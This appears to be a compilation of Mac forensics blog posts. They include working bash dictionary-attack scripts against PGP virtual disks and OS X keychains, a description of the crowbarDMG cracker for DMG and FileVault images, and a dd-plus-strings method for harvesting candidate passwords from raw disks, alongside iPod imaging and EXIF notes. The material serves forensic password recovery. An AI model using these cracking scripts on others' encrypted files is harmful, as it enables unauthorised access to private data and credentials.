Mac Shell Script – Crack PGP Virtual Disk (PGD)

Today I was not up for doing any full program code. On top of that I recorded an upcoming Typical Mac User show with Victor, answering some listener questions about file encryption. One of the things we talked about was PGP for Mac. I got to wondering: what are the odds that they provide a command line option for mounting PGP encrypted discs? Can I do yet another dictionary attack script?

Here is what I have initially found. Note we are talking about a PGP virtual disk file set up for passphrase authentication, NOT key authentication. You must have the commercial Mac PGP Whole Disk Encryption application installed.

There is a pgpdisk --mount command. So can we toss it in a loop like we did for DMG files? Why of course we can! Note that you need to change the dictionary path and file to the one you want, and likewise the target .PGD file. For the PGD file, the example below uses PGPTest, given as the full path minus the .pgd extension.

You will notice when you run your attack that you see some text about "Error -11998 - buffer too small". This is because normally, if the passphrase you enter is wrong, pgpdisk will prompt you three more times. By piping the echo in at the front of the line we cause it to error out and skip those extra prompts, so the loop keeps going through our dictionary file.

#!/bin/bash
# Dictionary attack against a passphrase-protected PGP virtual disk.
# Edit DICT (one candidate per line, lines containing # are skipped) and
# PGD (full path to the .pgd file minus the extension) before running.
DICT=/Volumes/ExternalDrive/Dictionaries/test.txt
PGD=/Volumes/MyBook/PGPDisks/PGPTest

while IFS= read -r word
do
    # The echo on stdin makes pgpdisk error out ("Error -11998 - buffer too
    # small") instead of re-prompting after a wrong passphrase.
    echo -n "$word" | pgpdisk --mount "$PGD" --passphrase "$word"
    if [[ $? = 0 ]]
    then
        echo "Password found!"
        echo "$word"
        exit 0
    fi
done < <(grep -v '#' "$DICT")

echo "password not found :("
exit 1


crowbarKC-Version 1.0

I decided to make a quick version of crowbarDMG that works on OSX Keychain files. So here you go. Right now in v1.0 it only works exactly as crowbarDMG does and finds the main unlock password. It is a good deal faster testing keychain files than disc images. Like crowbarDMG it is Leopard only. I am looking for a way to dump the contents of a keychain once it unlocks. If I can come up with a good solution I will release an update via the auto update mechanism.

Thanks to the following code and frameworks: 

crowbarKC

Mac Shell Script – Crack Keychain

While I work out an updated copy of crowbarDMG to go after keychains, I wanted to give you a quick shell script to achieve the same thing. A long time ago I posted a script for going after DMG files. It takes only a slight edit to make it work for keychain files. You will want to change test.txt to your dictionary file and keytest.keychain to your desired file.

#!/bin/bash
# Dictionary attack against an OSX keychain's unlock password.
# Edit DICT (one candidate per line, lines containing # are skipped) and
# KEYCHAIN before running.
DICT=~/test.txt
KEYCHAIN=~/keytest.keychain

while IFS= read -r word
do
    security unlock-keychain -p "$word" "$KEYCHAIN"
    if [[ $? = 0 ]]
    then
        echo "Password found"
        echo "$word"
        exit 0
    fi
done < <(grep -v '#' "$DICT")

echo "Password not found"
exit 1


Strings on a dd image

It is a common forensics technique to run strings against a disc image. One issue I ran into while testing my crowbarDMG tool was that this often leaves a lot of control characters in the file. So here is a way to remove the non-printable characters from your dictionary file. I also added the "%@" characters to the scrub, since I found they would crash my program. In a future update I will provide automatic filtering of those problem characters. It uses the tr command instead of sed or awk.

tr -d '\001-\011\013\014\016-\037\200-\377%@' < dictionary.txt > dictionary-cleaned.txt
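Here is that tr filter wrapped in a function, with a check that shows what it keeps and what it silently drops. This is an added example, not code from the original post; the file names are placeholders and the sample words are constructed.

```shell
#!/bin/sh
# Added example, not from the original post: the tr filter above wrapped in a
# function, plus a check that shows what it keeps and what it silently drops.
# File names are placeholders; the sample words below are constructed.

# clean_dictionary IN OUT: delete control bytes \001-\011, \013, \014 and
# \016-\037, every high-bit byte \200-\377 and the characters % and @.
# LC_ALL=C makes tr work on raw bytes on both OS X and Linux.
# Two things to know before trusting the output:
#  - tr -d removes a SET of characters, so '%@' strips every % and every @,
#    not just the two-character sequence "%@".
#  - \012 (LF), \015 (CR) and \177 (DEL) are not in the set and pass through,
#    and dropping \200-\377 removes every byte of a UTF-8 character, so an
#    accented passphrase is reduced to its ASCII remainder.
clean_dictionary() {
    LC_ALL=C tr -d '\001-\011\013\014\016-\037\200-\377%@' < "$1" > "$2"
}

# count_unclean FILE: how many lines still contain a byte outside printable
# ASCII (space through ~). Use it to see what the filter left behind.
count_unclean() {
    LC_ALL=C grep -ac '[^ -~]' "$1" || true
}

# nth_line N FILE: the N-th word of FILE
nth_line() { sed -n "${1}p" "$2"; }

# demo: four constructed words: one with a control byte, one with %@, one
# UTF-8 word (cafe with an accented e) and one with a Windows CR line ending
demo() {
    tmp=$(mktemp -d) || return 1
    printf 'secret\001word\nfoo%%@bar\ncaf\303\251\nline\r\n' > "$tmp/dictionary.txt"
    clean_dictionary "$tmp/dictionary.txt" "$tmp/dictionary-cleaned.txt"
    echo "lines with stray bytes before: $(count_unclean "$tmp/dictionary.txt")"
    echo "lines with stray bytes after:  $(count_unclean "$tmp/dictionary-cleaned.txt")"
    cat -v "$tmp/dictionary-cleaned.txt"
    rm -rf "$tmp"
}
demo
```

The CR line is the one left behind: a dictionary saved with Windows line endings needs the CR stripped separately, or every word carries a trailing byte and never matches.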

Update:

For those who do not want to mess with the command line to clean up their dictionary, you can download this in an Automator app wrapper HERE.


crowbarDMG – Version 1.0

Well here we are.  Finally, my very first full Cocoa program. One that does not come from a book.

crowbarDMG is a dictionary attack tool for DMG and sparseimage files for Macs. It does require 10.5 Leopard. It really wasn't worth the trouble to redo things to work on Tiger. It is completely free, so enjoy. Be sure to read the included PDF readme file. It addresses an issue if you use strings to pull out a dictionary from a disc image: some control characters need to be scrubbed or they will crash crowbarDMG. Give it a shot if you need to recover a password for a dmg or filevault file.

*UPDATE* – Please make sure to run Check for Updates to obtain the latest build.  I have released v1.0.1 that implements garbage collection to help prevent memory leaks for long duration projects.

Thanks to Paul Figgiani for his patience in making GUI layout and improvement suggestions.

Thanks to Big Nerd Ranch for the fun bootcamp last October. I would never have had the time to get up to speed on Xcode and Objective-C purely on my own.

Thanks as well to the following code and frameworks:

crowbarDMG – Download

Exif Data Dump

I was working on some exercises for the SANS SEC-508 forensics class. Being the lazy person that I am, rather than manually extract exif data from the recovered images I made an Automator workflow to do it for me. I had some issues trying to use some code that previously worked under Tiger, so here it is for Leopard. The only downside is that it breaks if the path or filename has a space in it.

Note you do need Phil Harvey’s ExifTool installed.

[ExifDump Automator workflow screenshot]

Making a dictionary file.

I realize it has been a while since I posted on the full blog.  I do minor things via twitter.  Toss in the holidays, then lots of stuff to start the year = lazy on the blog.  

I have been writing my first real program on OSX in Cocoa.  A disc image (DMG) dictionary attack tool.  It is coming along nicely and once done I will throw it out to the public intended as a free tool to Mac based forensics examiners.  I have posted on here before about a shell script to do this.  Making the program native in Cocoa means a lot more options etc.  Not to mention fun for me to learn.

Filevault is nothing but an encrypted sparseimage disc image file.  So in my testing I wanted to see if my tool could crack my own filevault.  To do this I needed a reasonably targeted dictionary file.  So in a pinch here is a fun way to make a simple attack dictionary.  

  1. Open Terminal
  2. df
    This command shows disc usage and what discs are mounted. Let's say this iPod is actually my other laptop connected via FireWire target disc mode. Notice below the root drive is shown and it is disk0s2.

    /dev/disk2s3    117013560  93569848  23443712    80% /Volumes/iPod

  3. dd if=/dev/rdisk2 | strings > myDictionary.txt
  4. Wait a good long time if the drive is large. You are streaming the drive level blocks through the strings command to extract all readable ASCII strings into a nice text file.

So I used that file for going after the filevault sparseimage file from my old laptop using my dictionary attack tool. I got lucky: my password was in the strings, but not by itself. It was embedded in some other text, and I had to find it with grep against myDictionary.txt. It was cached way back in time in the unencrypted space on my hard drive by some third party tool. So without some extra work it would not have actually cracked my filevault. But it sure came close. And from a 40GB old PowerBook drive it would have only taken 3 days to run the full myDictionary.txt file against my filevault.


iPod – Imaging and Data Recovery

One of the guys from the Nashville Mac Users group asked me about recovering some audio files from an iPod. A friend of his used an iTalk to record some audio, about 200MB worth of audio files. For some reason it is not syncing from the iPod. He also has no idea which of his many Macs is the master for the iPod, and he would have to let it wipe the iPod to associate it with a new Mac that he is sure is the master. So I got to playing around. My iPod is in disk mode.

  1. Open Terminal
  2. df
    This command shows disc usage and what discs are mounted. Notice below the iPod is shown and it is disk2s3. Keep in mind the main disk# can change every time you reboot if you have multiple external drives.

    /dev/disk2s3    117013560  93569848  23443712    80% /Volumes/iPod

  3. I have an external SATA drive with far more free space than the size of my iPod (60GB).
  4. dd bs=512 if=/dev/rdisk2 of=/Volumes/ExtSata/ipodimage.dmg
    This command does a disc image of the raw disk#2 matching up to what we saw in step 2 above.  You want the raw disk (rdisk) since it is faster for making an image.   So we use a block size of 512 (bs) from an input file (if) of /dev/rdisk2 to an output file (of) of /Volumes/ExtSata/ipodimage.dmg
  5. Wait a really long time (it was overnight for me). When the dmg file shows in Finder as large as the iPod, close Terminal, eject the real iPod and try double clicking on the new ipodimage.dmg file.

For me it opened up fine, mounting as a disc image. I could then browse the contents of the iPod. Of course I could feed it to one of my forensic tools, since it is a disc image and easy to parse with file recovery tools etc. Now I know it works. The question is whether I can use this to get past any issues on the fellow's iPod and drag his audio files out of the disc image. If we encountered any errors I would do the dd command again but add conv=sync,noerror at the end.

The noerror tells DD to keep going and not end if it hits an error.  The sync tells DD to  pad any error spots with null.  That is an attempt to get around any errors on the disc.
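Here is the imaging step as a small script, with a check that most people skip: because sync pads the last partial block, a checksum of the finished image will not match a checksum of the source device. This is an added example, not from the original post; a constructed file stands in for /dev/rdisk2 and every path is a placeholder.

```shell
#!/bin/sh
# Added example, not from the original post: image a raw device with dd using
# conv=noerror,sync, then check the image against the source. A constructed
# file stands in for /dev/rdisk2 and every path here is a placeholder.

# image_device SRC DST: block-wise copy. noerror keeps dd going past read
# errors; sync pads each short or failed block with NUL to a full 512 bytes.
image_device() {
    dd if="$1" of="$2" bs=512 conv=noerror,sync 2>/dev/null
}

# crc FILE: POSIX cksum CRC of FILE (cksum exists on both OS X and Linux)
crc() { cksum < "$1" | awk '{print $1}'; }

# size_bytes FILE
size_bytes() { wc -c < "$1" | tr -d ' '; }

# make_device PATH BYTES: constructed stand-in for a BYTES-byte raw device
make_device() { yes 'ipod-audio-block' | head -c "$2" > "$1"; }

# verify_image SRC IMG: because sync pads the final partial block, a hash of
# the whole image will not match a hash of the source. Compare the source
# against the same number of bytes from the image instead.
# Prints "match" or "mismatch".
verify_image() {
    n=$(size_bytes "$1")
    if [ "$(crc "$1")" = "$(head -c "$n" "$2" | cksum | awk '{print $1}')" ]
    then echo match
    else echo mismatch
    fi
}

# demo: a 1000-byte source becomes a 1024-byte image (two full 512-byte blocks)
demo() {
    tmp=$(mktemp -d) || return 1
    make_device "$tmp/device" 1000
    image_device "$tmp/device" "$tmp/ipodimage.dmg"
    echo "source: $(size_bytes "$tmp/device") bytes, crc $(crc "$tmp/device")"
    echo "image:  $(size_bytes "$tmp/ipodimage.dmg") bytes, crc $(crc "$tmp/ipodimage.dmg")"
    echo "source vs. first $(size_bytes "$tmp/device") bytes of image: $(verify_image "$tmp/device" "$tmp/ipodimage.dmg")"
    rm -rf "$tmp"
}
demo
```

On a real device whose size is already a multiple of the block size the padding never kicks in, but any block that noerror skipped is still replaced by NULs, so record the source and image hashes separately rather than expecting them to agree.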
